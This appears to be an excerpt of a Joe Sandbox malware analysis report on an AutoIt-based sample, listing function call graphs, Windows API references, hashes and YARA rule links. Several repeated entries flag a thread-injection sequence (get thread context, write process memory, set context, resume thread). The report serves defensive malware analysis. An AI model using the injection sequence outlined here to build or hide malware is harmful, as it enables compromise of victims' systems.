                                                                                                                                                                            control_flow_graph 1418 8890d5-8890e5 1419 8890ff-889101 1418->1419 1420 8890e7-8890fa call 87f656 call 87f669 1418->1420 1422 889469-889476 call 87f656 call 87f669 1419->1422 1423 889107-88910d 1419->1423 1437 889481 1420->1437 1439 88947c call 882b7c 1422->1439 1423->1422 1424 889113-88913e 1423->1424 1424->1422 1427 889144-88914d 1424->1427 1430 88914f-889162 call 87f656 call 87f669 1427->1430 1431 889167-889169 1427->1431 1430->1439 1435 88916f-889173 1431->1435 1436 889465-889467 1431->1436 1435->1436 1442 889179-88917d 1435->1442 1440 889484-889489 1436->1440 1437->1440 1439->1437 1442->1430 1445 88917f-889196 1442->1445 1447 889198-88919b 1445->1447 1448 8891b3-8891bc 1445->1448 1449 88919d-8891a3 1447->1449 1450 8891a5-8891ae 1447->1450 1451 8891da-8891e4 1448->1451 1452 8891be-8891d5 call 87f656 call 87f669 call 882b7c 1448->1452 1449->1450 1449->1452 1456 88924f-889269 1450->1456 1454 8891eb-8891ec call 883bb0 1451->1454 1455 8891e6-8891e8 1451->1455 1481 88939c 1452->1481 1464 8891f1-889209 call 882d58 * 2 1454->1464 1455->1454 1458 88933d-889346 call 88fc3b 1456->1458 1459 88926f-88927f 1456->1459 1470 889348-88935a 1458->1470 1471 8893b9 1458->1471 1459->1458 1463 889285-889287 1459->1463 1463->1458 1467 88928d-8892b3 1463->1467 1491 88920b-889221 call 87f669 call 87f656 1464->1491 1492 889226-88924c call 8897b4 1464->1492 1467->1458 1472 8892b9-8892cc 1467->1472 1470->1471 1476 88935c-88936b GetConsoleMode 1470->1476 1474 8893bd-8893d5 ReadFile 1471->1474 1472->1458 1477 8892ce-8892d0 1472->1477 1479 889431-88943c GetLastError 1474->1479 1480 8893d7-8893dd 1474->1480 1476->1471 1482 88936d-889371 1476->1482 1477->1458 1483 8892d2-8892fd 1477->1483 1485 88943e-889450 call 87f669 call 87f656 1479->1485 1486 889455-889458 1479->1486 1480->1479 1487 8893df 1480->1487 1489 88939f-8893a9 call 882d58 1481->1489 1482->1474 1488 889373-88938d ReadConsoleW 1482->1488 1483->1458 1490 8892ff-889312 1483->1490 1485->1481 1499 88945e-889460 1486->1499 1500 889395-88939b call 87f633 1486->1500 1495 8893e2-8893f4 1487->1495 1497 8893ae-8893b7 1488->1497 1498 88938f GetLastError 1488->1498 1489->1440 1490->1458 1502 889314-889316 1490->1502 1491->1481 1492->1456 1495->1489 1506 8893f6-8893fa 1495->1506 1497->1495 1498->1500 1499->1489 1500->1481 1502->1458 1503 889318-889338 1502->1503 1503->1458 1512 8893fc-88940c call 888df1 1506->1512 1513 889413-88941e 1506->1513 1524 88940f-889411 1512->1524 1518 88942a-88942f call 888c31 1513->1518 1519 889420 call 888f41 1513->1519 1525 889425-889428 1518->1525 1519->1525 1524->1489 1525->1524
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d537300827b2ac7fa6a365562e774f0a45249a20893bb18b206e6c09b2bb48df
                                                                                                                                                                            • Instruction ID: ea848cf6c5a00df1c1f294e447acb8f3a6e85fd20207905676a040faba3a20a3
                                                                                                                                                                            • Opcode Fuzzy Hash: d537300827b2ac7fa6a365562e774f0a45249a20893bb18b206e6c09b2bb48df
                                                                                                                                                                            • Instruction Fuzzy Hash: 69C1E370A04249AFDB11EFACD845BBDBBB4FF19310F184199E9A4E7392C7349942CB61
                                                                                                                                                                            Function 0085353A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00853568
                                                                                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00853589
                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,008532EF,?), ref: 0085359D
                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,008532EF,?), ref: 008535A6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$CreateShow
                                                                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                                                                                            • Opcode ID: 10235ac61d95f949d450ec1895b489b53f23432e8acdf94b7d36c48f365dafb6
                                                                                                                                                                            • Instruction ID: c31b85fb3c8001592f2e9e95e72703c46c8fb22e08cc3526903c625b867e51e3
                                                                                                                                                                            • Opcode Fuzzy Hash: 10235ac61d95f949d450ec1895b489b53f23432e8acdf94b7d36c48f365dafb6
                                                                                                                                                                            • Instruction Fuzzy Hash: F6F0FE716543D4BAE73197176C48E373EBDE7CBF50F00002EBA04AB160D6691856EAB1
                                                                                                                                                                            Function 008AE71E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32 ref: 008AE72B
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 008AE73D
                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 008AE763
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                            • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                            • API String ID: 145871493-2590602151
                                                                                                                                                                            • Opcode ID: 28d7af07c051a8823433fe440eafa2bd4b22a4518adefe39ed7b973cb85f8285
                                                                                                                                                                            • Instruction ID: cddd50384e07fdf8ba24f65a4b1990110ceeed0118f4c3c6d81166f625cfc891
                                                                                                                                                                            • Opcode Fuzzy Hash: 28d7af07c051a8823433fe440eafa2bd4b22a4518adefe39ed7b973cb85f8285
                                                                                                                                                                            • Instruction Fuzzy Hash: F6F02B708017289FE7725B608C88AA97224FF22B44F150C58F901EB850DF31CC48C788
                                                                                                                                                                            Function 008555F8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,008555EB,SwapMouseButtons,00000004,?), ref: 0085561C
                                                                                                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,008555EB,SwapMouseButtons,00000004,?), ref: 0085563D
                                                                                                                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,008555EB,SwapMouseButtons,00000004,?), ref: 0085565F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                            • String ID: Control Panel\Mouse
                                                                                                                                                                            • API String ID: 3677997916-824357125
                                                                                                                                                                            • Opcode ID: da6d652ed86f1e29aa95009cdc77bfab9fc9ad31cdc2cfd77c98bf016e1de284
                                                                                                                                                                            • Instruction ID: 47686c44501d98ab19436ac53751ae3d4c8b16514115d37b8192fda094a6841e
                                                                                                                                                                            • Opcode Fuzzy Hash: da6d652ed86f1e29aa95009cdc77bfab9fc9ad31cdc2cfd77c98bf016e1de284
                                                                                                                                                                            • Instruction Fuzzy Hash: 3B115AB5611648FFDB208F64CC80DAE77F8FF20745B444469A805D7120D6719E4897A0
                                                                                                                                                                            Function 0085F680 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • Variable must be of type 'Object'., xrefs: 008A486A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Variable must be of type 'Object'.
                                                                                                                                                                            • API String ID: 0-109567571
                                                                                                                                                                            • Opcode ID: b9aaff2568549356705bd4e42863a52ffaf0035a482639fdce86c8f424c36ac9
                                                                                                                                                                            • Instruction ID: ef330725a8f4c50b02e29b634bbc919051dfa987faebc3348664b07b32915e45
                                                                                                                                                                            • Opcode Fuzzy Hash: b9aaff2568549356705bd4e42863a52ffaf0035a482639fdce86c8f424c36ac9
                                                                                                                                                                            • Instruction Fuzzy Hash: AEC29C71A00218DFDB20CF58C880BAEB7B1FF49315F248169EA45EB366D774AD49CB91
                                                                                                                                                                            Function 01194F69 Relevance: 6.2, APIs: 4, Instructions: 159threadinjectionCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,?,D83D6AA1,00000000,?,?,?,00000000), ref: 0119504D
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000), ref: 01195099
                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 011950E4
                                                                                                                                                                            • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 01195104
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmp, Offset: 01142000, based on PE: false
                                                                                                                                                                            • Associated: 00000007.00000003.1602090695.0000000001142000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_10fc000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$ContextWow64$MemoryProcessResumeWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3157728184-0
                                                                                                                                                                            • Opcode ID: 6e8410c75c5da439bed814519b89cc25b1b9f4ff36e5d3c26356679873be4647
                                                                                                                                                                            • Instruction ID: f0065fffc5f78fa7cff088d282f2b56f83ff3b160fac57084b5a74902e79251d
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e8410c75c5da439bed814519b89cc25b1b9f4ff36e5d3c26356679873be4647
                                                                                                                                                                            • Instruction Fuzzy Hash: C741F0B07D02017FDB4EABB0CC42F397726AF66708F2440EAA6646F1E1DB625811C661
                                                                                                                                                                            Function 01194F69 Relevance: 6.2, APIs: 4, Instructions: 159threadinjectionCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,?,D83D6AA1,00000000,?,?,?,00000000), ref: 0119504D
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000), ref: 01195099
                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 011950E4
                                                                                                                                                                            • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 01195104
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmp, Offset: 010FC000, based on PE: false
                                                                                                                                                                            • Associated: 00000007.00000003.1602038320.00000000010FC000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_10fc000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$ContextWow64$MemoryProcessResumeWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3157728184-0
                                                                                                                                                                            • Opcode ID: 6e8410c75c5da439bed814519b89cc25b1b9f4ff36e5d3c26356679873be4647
                                                                                                                                                                            • Instruction ID: f0065fffc5f78fa7cff088d282f2b56f83ff3b160fac57084b5a74902e79251d
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e8410c75c5da439bed814519b89cc25b1b9f4ff36e5d3c26356679873be4647
                                                                                                                                                                            • Instruction Fuzzy Hash: C741F0B07D02017FDB4EABB0CC42F397726AF66708F2440EAA6646F1E1DB625811C661
                                                                                                                                                                            Function 01194F69 Relevance: 6.2, APIs: 4, Instructions: 159threadinjectionCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,?,D83D6AA1,00000000,?,?,?,00000000), ref: 0119504D
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000), ref: 01195099
                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 011950E4
                                                                                                                                                                            • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 01195104
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmp, Offset: 0118B000, based on PE: false
                                                                                                                                                                            • Associated: 00000007.00000003.1624407271.000000000118A000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_10fc000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$ContextWow64$MemoryProcessResumeWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3157728184-0
                                                                                                                                                                            • Opcode ID: 8f1ffb96e6e417cca4a8ad9690f0aa8d41597e7873cb9d6b2e4e3da244202727
                                                                                                                                                                            • Instruction ID: f0065fffc5f78fa7cff088d282f2b56f83ff3b160fac57084b5a74902e79251d
                                                                                                                                                                            • Opcode Fuzzy Hash: 8f1ffb96e6e417cca4a8ad9690f0aa8d41597e7873cb9d6b2e4e3da244202727
                                                                                                                                                                            • Instruction Fuzzy Hash: C741F0B07D02017FDB4EABB0CC42F397726AF66708F2440EAA6646F1E1DB625811C661
                                                                                                                                                                            Function 01194F69 Relevance: 6.2, APIs: 4, Instructions: 159threadinjectionCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,?,D83D6AA1,00000000,?,?,?,00000000), ref: 0119504D
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000), ref: 01195099
                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 011950E4
                                                                                                                                                                            • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 01195104
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmp, Offset: 0118A000, based on PE: false
                                                                                                                                                                            • Associated: 00000007.00000003.1624407271.000000000118A000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_10fc000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$ContextWow64$MemoryProcessResumeWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3157728184-0
                                                                                                                                                                            • Opcode ID: 8f1ffb96e6e417cca4a8ad9690f0aa8d41597e7873cb9d6b2e4e3da244202727
                                                                                                                                                                            • Instruction ID: f0065fffc5f78fa7cff088d282f2b56f83ff3b160fac57084b5a74902e79251d
                                                                                                                                                                            • Opcode Fuzzy Hash: 8f1ffb96e6e417cca4a8ad9690f0aa8d41597e7873cb9d6b2e4e3da244202727
                                                                                                                                                                            • Instruction Fuzzy Hash: C741F0B07D02017FDB4EABB0CC42F397726AF66708F2440EAA6646F1E1DB625811C661
                                                                                                                                                                            Function 01194F69 Relevance: 6.2, APIs: 4, Instructions: 159threadinjectionCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,?,D83D6AA1,00000000,?,?,?,00000000), ref: 0119504D
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000), ref: 01195099
                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 011950E4
                                                                                                                                                                            • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 01195104
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmp, Offset: 01193000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_10fc000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$ContextWow64$MemoryProcessResumeWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3157728184-0
                                                                                                                                                                            • Opcode ID: 6cb7b0c944d230534f36a00f08c8c21c5c457225fa25408c126426058f5612c4
                                                                                                                                                                            • Instruction ID: f0065fffc5f78fa7cff088d282f2b56f83ff3b160fac57084b5a74902e79251d
                                                                                                                                                                            • Opcode Fuzzy Hash: 6cb7b0c944d230534f36a00f08c8c21c5c457225fa25408c126426058f5612c4
                                                                                                                                                                            • Instruction Fuzzy Hash: C741F0B07D02017FDB4EABB0CC42F397726AF66708F2440EAA6646F1E1DB625811C661
                                                                                                                                                                            Function 01195000 Relevance: 6.1, APIs: 4, Instructions: 90threadinjectionCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A), ref: 0119504D
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE ref: 01195099
                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 011950E4
                                                                                                                                                                            • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 01195104
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1601920919.0000000001195000.00000004.00000020.00020000.00000000.sdmp, Offset: 01195000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_1195000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$ContextWow64$MemoryProcessResumeWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3157728184-0
                                                                                                                                                                            • Opcode ID: 0c71952a933287a309488c91c0a1fde4985ea5cdabd019cb6c0772bacad8af37
                                                                                                                                                                            • Instruction ID: e23d111146c2ac771bead5a66d249e8406c684dd986c358aad955898ded85fdc
                                                                                                                                                                            • Opcode Fuzzy Hash: 0c71952a933287a309488c91c0a1fde4985ea5cdabd019cb6c0772bacad8af37
                                                                                                                                                                            • Instruction Fuzzy Hash: 8321CFB07D02017BEB4E7BB0CC42F397616AFA670CF2040A9A6246F2D1DB6258118662
                                                                                                                                                                            Function 008BDA81 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,008EDC30), ref: 008BDABB
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008BDACA
                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000), ref: 008BDAD9
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,008EDC30), ref: 008BDB36
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2267087916-0
                                                                                                                                                                            • Opcode ID: 8cefe9c0d1fb3c9fd1c2828a5a76c9be10e5414952fe5127301b202d5ce71c16
                                                                                                                                                                            • Instruction ID: 8cc5dbb03a79b434146bea594284dc1b7802f15ce2828626c8d928f347ab4498
                                                                                                                                                                            • Opcode Fuzzy Hash: 8cefe9c0d1fb3c9fd1c2828a5a76c9be10e5414952fe5127301b202d5ce71c16
                                                                                                                                                                            • Instruction Fuzzy Hash: 4D217131508345AF8700DF28D8818AAB7E4FF56368F144A1DF8A9C73A1E730E949CB53
                                                                                                                                                                            Function 008602F0 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 008615A2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1385522511-0
                                                                                                                                                                            • Opcode ID: 110f1ec9fdbe04083c36542b02de31aadd3c02f8f9f0e4d44b93f0946f4daa8c
                                                                                                                                                                            • Instruction ID: 726c676126c4fe8e0d39b9b9bcc0777e4b7607d9ed95b8c2f4f12f8c5c3f98b7
                                                                                                                                                                            • Opcode Fuzzy Hash: 110f1ec9fdbe04083c36542b02de31aadd3c02f8f9f0e4d44b93f0946f4daa8c
                                                                                                                                                                            • Instruction Fuzzy Hash: 5FB26774A08300CFDB24CF18C480A2AB7E1FB99314F29895DE99ADB352D771E945CF96
                                                                                                                                                                            Function 0087016B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 008709F8
                                                                                                                                                                              • Part of subcall function 00873634: RaiseException.KERNEL32(?,?,?,00870A1A,?,00000000,?,?,?,?,?,?,00870A1A,00000000,00919758,00000000), ref: 00873694
                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00870A15
                                                                                                                                                                            Strings
